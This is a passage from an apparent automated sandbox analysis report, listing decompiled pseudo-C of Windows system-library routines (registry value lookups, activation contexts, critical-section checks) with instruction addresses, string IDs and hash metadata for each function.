				_v1172 = L"BinaryHash";
				_t81 = E018D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01913706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E018DFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01913540;
						E018DFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E018EDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01920C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E018D97C0();
					}
					return E018DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01913971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01913884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E018DFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E018D9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01913787(_a4,  &_v352, _t80);
						}
					}
					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E018D95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                0x01913552
                0x0191355a
                0x0191355d
                0x01913566
                0x01913567
                0x0191357e
                0x0191358f
                0x019135a1
                0x019135a5
                0x0191366b
                0x0191366b
                0x0191366d
                0x01913672
                0x01913679
                0x01913685
                0x0191368d
                0x0191369d
                0x019136a7
                0x019136b8
                0x019136c6
                0x019136c7
                0x019136dc
                0x019136e1
                0x019136e7
                0x019136e9
                0x019136e9
                0x01913703
                0x01913703
                0x019135b5
                0x019135c0
                0x019135c4
                0x00000000
                0x00000000
                0x019135ca
                0x019135d7
                0x019135e2
                0x019135e6
                0x019135e8
                0x019135f5
                0x019135fa
                0x01913603
                0x01913604
                0x01913609
                0x0191360a
                0x01913612
                0x01913613
                0x0191361e
                0x01913622
                0x01913628
                0x0191362f
                0x0191362f
                0x01913636
                0x01913638
                0x0191363b
                0x01913642
                0x01913642
                0x01913636
                0x01913657
                0x01913657
                0x0191365c
                0x01913662
                0x01913669
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: BinaryHash
                • API String ID: 0-2202222882
                • Opcode ID: 81aea42c6b4a58548f2176ea7dc0aa0aaa43932d66ce83c4fed2e6f1e7713eb8
                • Instruction ID: aa6f18ccc8101631416b7888732731e531c8ac971850e3267508d2e71950ad28
                • Opcode Fuzzy Hash: 81aea42c6b4a58548f2176ea7dc0aa0aaa43932d66ce83c4fed2e6f1e7713eb8
                • Instruction Fuzzy Hash: 4C4133B1D0062D9BDB21DA54CC85F9EB77CAB44768F0045A5EA0DAB240DB309F888F95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 019605AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E019605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E019607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E018D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0195A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0195A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01961293(_t79, _v40, E019607DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E018B7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0195138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                0x019605c5
                0x019605ca
                0x019605d3
                0x019606db
                0x019606db
                0x019606dd
                0x019606e3
                0x019606e3
                0x019605dd
                0x019605e7
                0x019605f6
                0x01960600
                0x01960607
                0x01960610
                0x01960615
                0x0196061a
                0x0196061c
                0x0196061e
                0x01960624
                0x01960625
                0x01960627
                0x01960628
                0x01960631
                0x01960640
                0x0196064d
                0x01960654
                0x01960654
                0x01960631
                0x0196066d
                0x01960674
                0x00000000
                0x00000000
                0x01960692
                0x0196069e
                0x019606b0
                0x019606a0
                0x019606a9
                0x019606a9
                0x019606b8
                0x019606d6
                0x019606d6
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: `
                • API String ID: 0-2679148245
                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                • Instruction ID: 9c94b693a90e43bc64b9675ed46cc147436aa2d1349d3b54eb993dd44d087442
                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                • Instruction Fuzzy Hash: 0731C0326043466BE720DE29CD85F9A7B9DBBC4754F184229FA58AB2C0D770ED14CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01913884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E01913884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E018D9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L018B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E018D9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                0x01913893
                0x01913896
                0x01913899
                0x0191389f
                0x019138a0
                0x019138a4
                0x019138a9
                0x019138ac
                0x019138ad
                0x019138ae
                0x019138af
                0x019138b1
                0x019138b4
                0x019138bb
                0x019138bc
                0x019138bd
                0x019138c4
                0x019138c8
                0x019138ca
                0x019138ca
                0x019138d5
                0x0191393e
                0x01913940
                0x01913942
                0x01913952
                0x01913954
                0x01913961
                0x01913961
                0x01913967
                0x0191396e
                0x0191396e
                0x01913947
                0x0191394c
                0x00000000
                0x0191394c
                0x019138ea
                0x019138ee
                0x019138f8
                0x019138f9
                0x019138ff
                0x01913900
                0x01913902
                0x01913903
                0x0191390b
                0x0191390f
                0x01913950
                0x00000000
                0x01913950
                0x01913915
                0x0191391d
                0x0191391d
                0x01913922
                0x01913926
                0x00000000
                0x01913928
                0x0191392b
                0x0191392b
                0x01913935
                0x01913937
                0x01913937
                0x00000000
                0x01913935
                0x01913926
                0x019138f0
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: BinaryName
                • API String ID: 0-215506332
                • Opcode ID: fcb7f2b9d5a06e3eaf436c456e174efd45faf57d07424f37126ac934e4eb3a9c
                • Instruction ID: 8356551936df8b447f58e8eb8c4deb9af734fcf30d4d005b14836572e6faf5bb
                • Opcode Fuzzy Hash: fcb7f2b9d5a06e3eaf436c456e174efd45faf57d07424f37126ac934e4eb3a9c
                • Instruction Fuzzy Hash: 8431F472D0060EEFEB16DA5CC945D6BBB79FB80730F014169E919A7244D7309F40C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018CD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                Download Yara Rule
                C-Code - Quality: 33%
                			E018CD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x198d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E018B4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E018DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E018D98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E018D95D0();
					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                0x018cd29c
                0x018cd2a6
                0x018cd2b1
                0x018cd2b5
                0x018cd2b6
                0x018cd2bc
                0x018cd2bd
                0x018cd2be
                0x018cd2bf
                0x018cd2c2
                0x018cd2c4
                0x018cd2cc
                0x018cd384
                0x018cd34b
                0x018cd34f
                0x018cd350
                0x018cd351
                0x018cd35c
                0x018cd35c
                0x018cd2d6
                0x018cd2da
                0x018cd2e1
                0x018cd361
                0x018cd369
                0x018cd36d
                0x018cd2e3
                0x018cd2e3
                0x018cd2e3
                0x018cd2e5
                0x018cd2ed
                0x018cd2f5
                0x018cd2fa
                0x018cd302
                0x018cd303
                0x018cd30b
                0x018cd30f
                0x018cd313
                0x018cd318
                0x018cd31c
                0x018cd320
                0x018cd379
                0x018cd37d
                0x00000000
                0x00000000
                0x0190affe
                0x0190b001
                0x0190b011
                0x00000000
                0x018cd322
                0x018cd322
                0x018cd330
                0x018cd337
                0x018cd35d
                0x018cd339
                0x018cd33f
                0x018cd38c
                0x018cd38c
                0x018cd33f
                0x018cd349
                0x00000000
                0x018cd349

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 53ce8b0564b485c13b6e87bbece3317daafb414ea3b66a3ba7717a35bb26d95d
                • Instruction ID: eef6c4e756287343409da42fcf3f65814b504c60b7bd9eb39ff1636c21a4d0ce
                • Opcode Fuzzy Hash: 53ce8b0564b485c13b6e87bbece3317daafb414ea3b66a3ba7717a35bb26d95d
                • Instruction Fuzzy Hash: 84317EB15083459FC311EF68C9809ABBBE8EB95B58F000A2EF995C3251E634DE04CBD3
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018A1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E018A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E018DBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E018DA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E018DA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L018B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                0x018a1b8f
                0x018a1b9a
                0x018a1b9c
                0x018a1b9e
                0x018a1ba3
                0x018f7010
                0x018f7010
                0x00000000
                0x018a1ba9
                0x018a1ba9
                0x018a1bae
                0x00000000
                0x018a1bc5
                0x018a1bca
                0x018a1bcf
                0x018a1bd0
                0x018a1bd1
                0x018a1bd2
                0x018a1bd6
                0x018a1bdc
                0x018a1be0
                0x018f6ffc
                0x018f7000
                0x00000000
                0x018f7006
                0x018f7009
                0x018f7009
                0x018a1be6
                0x018a1bec
                0x018a1c0b
                0x018a1c0b
                0x018a1c0c
                0x018a1c11
                0x018a1c12
                0x018a1c15
                0x018a1c1b
                0x018a1c1f
                0x018a1c31
                0x018a1c33
                0x018f7026
                0x018f7026
                0x018a1c21
                0x018a1c24
                0x018a1c24
                0x018a1bee
                0x018a1bee
                0x018a1bf2
                0x018a1c3a
                0x018a1bf4
                0x018a1bf4
                0x018a1c05
                0x018a1c05
                0x018a1c09
                0x018a1c3e
                0x00000000
                0x00000000
                0x00000000
                0x018a1c09
                0x018a1bec
                0x018a1be0
                0x018a1bae
                0x018a1c2e

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: WindowsExcludedProcs
                • API String ID: 0-3583428290
                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                • Instruction ID: a33598813d55644a9b92a22f86c02ed58675cddc10b6dbbd8a8b1f15d33f6528
                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                • Instruction Fuzzy Hash: 3121073A500229EBFB229A5DC884F9BBBADEF91B54F154425FE04CB200D630DF00D7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018BF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E018BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                0x018bf71d
                0x018bf722
                0x018bf726
                0x01904770
                0x018bf765
                0x018bf769
                0x018bf769
                0x018bf732
                0x0190477a
                0x00000000
                0x0190477a
                0x018bf738
                0x018bf73a
                0x018bf73c
                0x018bf73f
                0x018bf746
                0x018bf778
                0x018bf7a9
                0x018bf7a9
                0x018bf754
                0x018bf75a
                0x018bf75d
                0x018bf75f
                0x018bf761
                0x018bf76f
                0x018bf771
                0x018bf771
                0x018bf76f
                0x018bf763
                0x00000000
                0x018bf763
                0x018bf77d
                0x018bf7a3
                0x018bf7a5
                0x00000000
                0x018bf7a5
                0x018bf77f
                0x018bf782
                0x018bf784
                0x018bf786
                0x00000000
                0x00000000
                0x00000000
                0x018bf788
                0x018bf748
                0x018bf74d
                0x018bf78d
                0x018bf793
                0x018bf7b7
                0x018bf7bc
                0x00000000
                0x018bf7bc
                0x018bf798
                0x00000000
                0x00000000
                0x018bf79d
                0x018bf7b0
                0x00000000
                0x018bf7b0
                0x018bf79f
                0x00000000
                0x018bf74f
                0x018bf74f
                0x00000000
                0x018bf74f

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Actx
                • API String ID: 0-89312691
                • Opcode ID: b15f9f6834c29866325dc1be86fed4ca8998cf5f82887a021da949602704adab
                • Instruction ID: 607d4d6c51d26aaebcc1e9afe97864a1c212ce75d89abde95c2880d185bfec23
                • Opcode Fuzzy Hash: b15f9f6834c29866325dc1be86fed4ca8998cf5f82887a021da949602704adab
                • Instruction Fuzzy Hash: 9A11E6343046869BE7254E1D8CD07F677D5EB85328F2445AAEB65CB392D770DA40C348
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01948DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E01948DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1970d50);
				E018ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01925720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L018EDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L018EDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E018ED130(_t34, _t39, _t40);
			}





                0x01948df1
                0x01948df1
                0x01948df1
                0x01948df1
                0x01948df1
                0x01948df1
                0x01948df3
                0x01948df8
                0x01948dfd
                0x01948e00
                0x01948e0e
                0x01948e2a
                0x01948e36
                0x01948e38
                0x01948e3c
                0x01948e46
                0x01948e46
                0x01948e36
                0x01948e50
                0x01948e56
                0x01948e59
                0x01948e5c
                0x01948e60
                0x01948e67
                0x01948e6d
                0x01948e73
                0x01948e74
                0x01948eb1
                0x01948ebd

                Strings
                • Critical error detected %lx, xrefs: 01948E21
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Critical error detected %lx
                • API String ID: 0-802127002
                • Opcode ID: 4a1a13dfd193d1f70d7383fe6edabcf369d07fd5377357fe30ba7320ba2d69d1
                • Instruction ID: b42f070ff4e1db67269cff90b9d78584fcba59adaaee2f017ce7af9a913c20b0
                • Opcode Fuzzy Hash: 4a1a13dfd193d1f70d7383fe6edabcf369d07fd5377357fe30ba7320ba2d69d1
                • Instruction Fuzzy Hash: 71117571D04348EBDF24EFE88509BADBBB4AB05711F24421EE52CAB282C3345606CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0192FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                Download Yara Rule
                Strings
                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0192FF60
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                • API String ID: 0-1911121157
                • Opcode ID: ab0d52a26dac6d310397df8aeba0664abf36052be808018bacaf27112d1b15d2
                • Instruction ID: 005ba546abf523da495e4ba0bdf3a2475e2f76e94429b83c5d0d07ce755fe3a9
                • Opcode Fuzzy Hash: ab0d52a26dac6d310397df8aeba0664abf36052be808018bacaf27112d1b15d2
                • Instruction Fuzzy Hash: 9C110471910154EFEB22EF58C948FD8BBB1FF09705F158044E5089B265C7389A44CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01965BA5, Relevance: .6, Instructions: 592COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 81aeb595251e2fe83ab5c3c103b15c34ff4398e0b1aee2a7c2e8eb23072ee33a
                • Instruction ID: c985f1b2a856adc6ddd839d63fbc431a7de9c44dff43b752dff91faa52e19e9c
                • Opcode Fuzzy Hash: 81aeb595251e2fe83ab5c3c103b15c34ff4398e0b1aee2a7c2e8eb23072ee33a
                • Instruction Fuzzy Hash: D8426E75D00229CFEB24CF68C880BA9BBB9FF45305F1581AAD94DEB242D7749985CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018B4120, Relevance: .4, Instructions: 444COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b7fb597dcce5f1a5d1a7a520f89e854b393be241f6d960882c5b15bd937552f6
                • Instruction ID: 91c31fde95fbe2c159ba283130094ba58a144936b1d8848225251869e5ea331e
                • Opcode Fuzzy Hash: b7fb597dcce5f1a5d1a7a520f89e854b393be241f6d960882c5b15bd937552f6
                • Instruction Fuzzy Hash: 23F17C706086118FD724CF19C4C1ABABBE1EF88714F15492EF586CB362E734DA95CB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018C20A0, Relevance: .4, Instructions: 420COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 364454c1ad93720ad79a72d88ba919bc37108584a2cf85771306bee06a5abff7
                • Instruction ID: c12a71e52652ff100ddbde62495cee860d58e5f73358423831b490fbdef316a2
                • Opcode Fuzzy Hash: 364454c1ad93720ad79a72d88ba919bc37108584a2cf85771306bee06a5abff7
                • Instruction Fuzzy Hash: 38F1F4316083419FE726CB2CC44076ABBE7AFC5B24F05851EE999DB2D1D734DA41CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018AD5E0, Relevance: .4, Instructions: 353COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e8e92810a3c5c7deb4d555a30b14396f40df0ff2393e1dd4485197bb7f4a6570
                • Instruction ID: 4e1323bb3a5b0a1209ecb820d984d677d67a7fa4f84cde65e890995553e5b5b3
                • Opcode Fuzzy Hash: e8e92810a3c5c7deb4d555a30b14396f40df0ff2393e1dd4485197bb7f4a6570
                • Instruction Fuzzy Hash: 96E1C030A0435ACFFB35CF68C984BA9BBB2BF45304F444299DA09D7691D734AB81CB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018A849B, Relevance: .3, Instructions: 290COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 47c1dcdcc6e3ad8819cfa33ed24c0915d563c495ef7737ae592792326df2bb56
                • Instruction ID: 07f9e367f116ed228e04ed7b6d5cea0f87c5c5740390724625784638da8e2c2f
                • Opcode Fuzzy Hash: 47c1dcdcc6e3ad8819cfa33ed24c0915d563c495ef7737ae592792326df2bb56
                • Instruction Fuzzy Hash: 0FB15B70E04209DFEB19DFE9C984AADBBB5BF49308F50412DE605EB345D770AA45CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018C513A, Relevance: .3, Instructions: 258COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 14460e96fb036e18dbc8695f8a4b72035759115f919509a1c1d1b25072dea2ff
                • Instruction ID: 10b81105055641d0fcf347704865b502ac06aade9ce3a2e3b9f0f49bccc6a383
